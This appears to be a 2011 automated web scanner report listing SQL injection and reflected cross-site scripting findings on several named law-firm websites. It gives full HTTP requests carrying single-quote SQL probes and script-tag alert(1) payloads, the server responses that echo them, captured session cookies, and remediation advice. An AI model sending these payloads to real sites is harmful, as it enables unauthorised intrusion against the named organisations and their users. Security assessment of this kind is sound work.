The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.ebglaw.com/showoffice.aspx [User-Agent HTTP header]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ebglaw.com
Path:   /showoffice.aspx

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /showoffice.aspx HTTP/1.1
Host: www.ebglaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response 1 (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:48:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=og0sit55134r4kyfq5mdkl3n; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 25

500 Internal Server Error

Request 2

GET /showoffice.aspx HTTP/1.1
Host: www.ebglaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close

Response 2 (redirected)

HTTP/1.1 404 Not Found
Connection: close
Date: Wed, 19 Jan 2011 15:48:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=cjknstzb1jhxzoedkedo5kji; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 56279

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head pro
...[SNIP]...

1.2. http://www.fulbright.com/index.cfm [FUSEACTION parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The FUSEACTION parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the FUSEACTION parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.cfm?FUSEACTION=home.299'&pf=y HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:48:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                       <!-- " ---></TD></TD></TD></TH></T
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
[Macromedia][SQLServer JDBC Driver][SQLServer]Line 5: Incorrect syntax near ''.
</font>
...[SNIP]...

1.3. http://www.fulbright.com/index.cfm [article_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The article_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the article_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.cfm?fuseaction=news.detail&article_id=9405'&site_id=286 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:49:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                       <!-- " ---></TD></TD></TD></TH></T
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
[Macromedia][SQLServer JDBC Driver][SQLServer]Line 12: Incorrect syntax near ''.
</font>
...[SNIP]...

1.4. http://www.fulbright.com/index.cfm [emp_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The emp_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the emp_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.cfm?fuseaction=attorneys.detail&site_id=299&emp_id=377' HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:49:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                       <!-- " ---></TD></TD></TD></TH></T
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
[Macromedia][SQLServer JDBC Driver][SQLServer]Line 60: Incorrect syntax near ''.
</font>
...[SNIP]...

1.5. http://www.fulbright.com/index.cfm [eventID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The eventID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the eventID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.cfm?fuseaction=seminars.detail&eventID=5575'&site_id=492 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:51:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                       <!-- " ---></TD></TD></TD></TH></T
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
[Macromedia][SQLServer JDBC Driver][SQLServer]Line 4: Incorrect syntax near ''.
</font>
...[SNIP]...

1.6. http://www.fulbright.com/index.cfm [fuseaction parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The fuseaction parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the fuseaction parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.cfm?fuseaction=home.285' HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:49:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                       <!-- " ---></TD></TD></TD></TH></T
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
[Macromedia][SQLServer JDBC Driver][SQLServer]Line 5: Incorrect syntax near ''.
</font>
...[SNIP]...

1.7. http://www.fulbright.com/index.cfm [site_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The site_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the site_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.cfm?fuseaction=news.site&site_id=299' HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:49:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                       <!-- " ---></TD></TD></TD></TH></T
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
[Macromedia][SQLServer JDBC Driver][SQLServer]Line 9: Incorrect syntax near ''.
</font>
...[SNIP]...

2. Cross-site scripting (reflected)  previous  next
There are 259 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://jonesdaydiversity.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jonesdaydiversity.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbc5a'-alert(1)-'5b7885e79b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?fbc5a'-alert(1)-'5b7885e79b2=1 HTTP/1.1
Host: jonesdaydiversity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:23:59 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000610
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A37
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1389; path=/
Set-Cookie: PortletId=6605501; path=/
Set-Cookie: SiteId=1383; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=2zpeeq45alawxszruhbhql55; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1036&RootPortletID=616&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=FCW; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9991
Set-Cookie: NSC_MC_KpoftEbz_b37b38_IUUQ=ffffffff09d5f63f45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title id="ctl00_htmlTitle">Jones Day Diversity</title>
<link rel="stylesheet"
...[SNIP]...
<![CDATA[
var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/Home.aspx?fbc5a'-alert(1)-'5b7885e79b2=1';//]]>
...[SNIP]...

2.2. http://skaddenpractices.skadden.com/fca/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skaddenpractices.skadden.com
Path:   /fca/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f2fa"><script>alert(1)</script>7a7277b34d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fca/?6f2fa"><script>alert(1)</script>7a7277b34d3=1 HTTP/1.1
Host: skaddenpractices.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:14:42 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b PHP/5.2.5
Set-Cookie: Apache=173.193.214.243.1295460882218266; path=/
X-Powered-By: PHP/5.2.5
Set-Cookie: FRONTSKADDEN=f642355c896d83fe703b92dbf7d4cbd0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 26018


<!-- DW6 -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<title>Skadden - False Claims Act Defense</title>

<link href="scripts/skadden_mini.css" rel="stylesheet
...[SNIP]...
<a href="/fca/index.php?6f2fa"><script>alert(1)</script>7a7277b34d3=1&print=1" target="_blank" onmouseover="tprint.src='images/t-print2.gif';toolbox.src='images/sh-print.gif'" onmouseout="tprint.src='images/t-print1.gif';toolbox.src='images/sh-tools.gif'">
...[SNIP]...

2.3. http://skaddenpractices.skadden.com/hc/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skaddenpractices.skadden.com
Path:   /hc/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6d57"><script>alert(1)</script>5968cea9b03 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hc/?b6d57"><script>alert(1)</script>5968cea9b03=1 HTTP/1.1
Host: skaddenpractices.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:14:47 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b PHP/5.2.5
Set-Cookie: Apache=173.193.214.243.1295460887085136; path=/
X-Powered-By: PHP/5.2.5
Set-Cookie: FRONTSKADDENHC=81465b85641fb95bc04d846351eba1e0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 40019


<!-- DW6 -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<title>Skadden - Health Care</title>

<link href="scripts/skadden_mini.css" rel="stylesheet" type="text/
...[SNIP]...
<a href="/hc/index.php?b6d57"><script>alert(1)</script>5968cea9b03=1&print=1" target="_blank" onmouseover="tprint.src='images/t-print2.gif';toolbox.src='images/sh-print.gif'" onmouseout="tprint.src='images/t-print1.gif';toolbox.src='images/sh-tools.gif'">
...[SNIP]...

2.4. http://skaddenpractices.skadden.com/sec/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skaddenpractices.skadden.com
Path:   /sec/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81116"><script>alert(1)</script>ab7d185670b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sec/?81116"><script>alert(1)</script>ab7d185670b=1 HTTP/1.1
Host: skaddenpractices.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:14:43 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b PHP/5.2.5
Set-Cookie: Apache=173.193.214.243.1295460883243148; path=/
X-Powered-By: PHP/5.2.5
Set-Cookie: FRONTSKADDENSEC=93a86fa73ffca397505be2273bb8a129; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21654


<!-- DW6 -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<title>Skadden - SEC Enforcement and Compliance</title>

<link href="scripts/skadden_mini.css" rel="styl
...[SNIP]...
<iframe src="/sec/index.php?81116"><script>alert(1)</script>ab7d185670b=1&attorneys=1&inline=1" frameborder="0" scrolling="auto" name="primarycontact" allowtransparency="true" background-color="transparent">
...[SNIP]...

2.5. http://skaddenpractices.skadden.com/sec/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skaddenpractices.skadden.com
Path:   /sec/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ae3b"><script>alert(1)</script>cc7c0c0318c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sec/?7ae3b"><script>alert(1)</script>cc7c0c0318c=1 HTTP/1.1
Host: skaddenpractices.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:14:42 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b PHP/5.2.5
Set-Cookie: Apache=173.193.214.243.1295460882882759; path=/
X-Powered-By: PHP/5.2.5
Set-Cookie: FRONTSKADDENSEC=31dc20249a9ecac44a1bd41ef91f6911; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21654


<!-- DW6 -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<title>Skadden - SEC Enforcement and Compliance</title>

<link href="scripts/skadden_mini.css" rel="styl
...[SNIP]...
<a href="/sec/index.php?7ae3b"><script>alert(1)</script>cc7c0c0318c=1&print=1" target="_blank" onmouseover="tprint.src='images/t-print2.gif';toolbox.src='images/sh-print.gif'" onmouseout="tprint.src='images/t-print1.gif';toolbox.src='images/sh-tools.gif'">
...[SNIP]...

2.6. http://www.arnoldporter.com/practices.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.arnoldporter.com
Path:   /practices.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32e6e"><script>alert(1)</script>277857ca11c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices.cfm?u=FinancialServices&action=view&id=476&32e6e"><script>alert(1)</script>277857ca11c=1 HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Financial Services</title>
       <meta name="Descriptio
...[SNIP]...
<input type="hidden" name="32e6e"><script>alert(1)</script>277857ca11c" value="1" />
...[SNIP]...

2.7. http://www.arnoldporter.com/practices.cfm [u parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.arnoldporter.com
Path:   /practices.cfm

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8e37"><script>alert(1)</script>b1acff3e126 was submitted in the u parameter. This input was echoed as e8e37\"><script>alert(1)</script>b1acff3e126 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices.cfm?u=FinancialServicese8e37"><script>alert(1)</script>b1acff3e126&action=view&id=476 HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Financial Services</title>
       <meta name="Descriptio
...[SNIP]...
<input type="hidden" name="u" value="FinancialServicese8e37\"><script>alert(1)</script>b1acff3e126" />
...[SNIP]...

2.8. http://www.arnoldporter.com/publications.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.arnoldporter.com
Path:   /publications.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59ef8"><script>alert(1)</script>f0da3e29c6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /publications.cfm?action=search&search_publication_type_id=advisory&59ef8"><script>alert(1)</script>f0da3e29c6c=1 HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Publications</title>
       <meta name="Description" con
...[SNIP]...
<a href=" /publications.cfm?action=search&search_publication_type_id=advisory&59ef8"><script>alert(1)</script>f0da3e29c6c=1&expand_section=advisory">
...[SNIP]...

